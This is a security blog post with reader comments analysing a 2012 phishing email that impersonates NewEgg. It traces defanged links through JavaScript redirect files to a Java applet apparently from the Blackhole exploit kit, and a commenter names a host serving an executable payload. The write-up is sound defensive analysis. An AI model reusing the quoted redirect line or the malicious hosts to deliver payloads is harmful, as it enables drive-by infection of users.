Monday, April 9, 2012

NewEgg Phishing Scam leads to Java-based exploit?

If you haven't heard yet, there is a phishing email going around masquerading as a NewEgg payment verification.

(Sanitized image from Outlook with no images loaded)

Not surprisingly, the links all point to an initial URL: hxxp://ftp[dot]qsari[dot]org/YtWvZiiG/index.html, which contains references to 3 JavaScript files (I assume for redundancy; URLs altered to prevent clicking):

hxxp://congress-assistants[dot]fi/idm2TZP1/js.js
hxxp://mobileproductivemoneymaking[dot]com/oExXoVCh/js.js
hxxp://primasaleorganik[dot]com/3N6zKxSS/js.js

All of these files contain JavaScript pointing to the same location (URLs altered to prevent clicking):

document.location='hxxp://216[dot]224[dot]182[dot]94/showthread.php?t=d7ad916d1c0396ff';

This points to the final page, containing a Java applet.  The file path is obfuscated, partially by hex entities. It loads with parameters:

hxxp://216[dot]224[do]182[dot]94/data/Klot.jar?a=1

It passes a "code" param, code="ta.tc".  The archive contains 3 files:

ta/ta.class
ta/tb.class
ta/tc.class

At this point, we all know this is surely a Java exploit... Blackhole exploit kit comes to mind.  Here are the VirusTotal results (you will see my initial analysis there, which is contained in this blog post):

https://www.virustotal.com/file/49fd75119fdb50902e7e265b0243cc793eb4d9bd4675271e1853a04e194a3e18/analysis/

As any good malware used in a phishing campaign should, this file receives a  not-so-shocking 0/42.  I wonder how many users clicked this?  Luckily, the individuals who received this did not do so.  Instead, they forwarded it to me for advice.  Whew!

Coming up, I'll attempt to dig into analyzing the decompiled Java code...
Posted by at

4 comments:

  1. BirdManApril 9, 2012 at 2:44 PM

    This comment has been removed by the author.

    ReplyDelete
  2. BirdManApril 9, 2012 at 2:47 PM

    You are correct in your initial assumption that this is part of the black-hole exploit kit. Running the showthread stage through wepawet yielded different payloads.

    http://wepawet.cs.ucsb.edu/view.php?hash=c5933047334188c3774d5e5c887ce8e2&type=js

    In this run it requests the an executable, "Mk4Lf.exe" from hxxp://jmservice[.]servicos[.]ws

    In this case it appears to have leveraged a flash or shockwave exploit. The file mentioned above no longer is available for analysis. Happy hunting with the class files and nice write up!

    ReplyDelete
  3. Carl BenedictApril 9, 2012 at 2:57 PM

    Thanks man! I didn't get to that part yet :) It's too bad that the PE sample is offline already. I'm not worried... there will be more.

    ReplyDelete
  4. Carl BenedictApril 9, 2012 at 3:24 PM

    I pulled down the dll referenced in the Wepawet report.

    It gets loaded as a service silently. Time for some behavioral analysis!

    ReplyDelete

Subscribe to: Post Comments (Atom)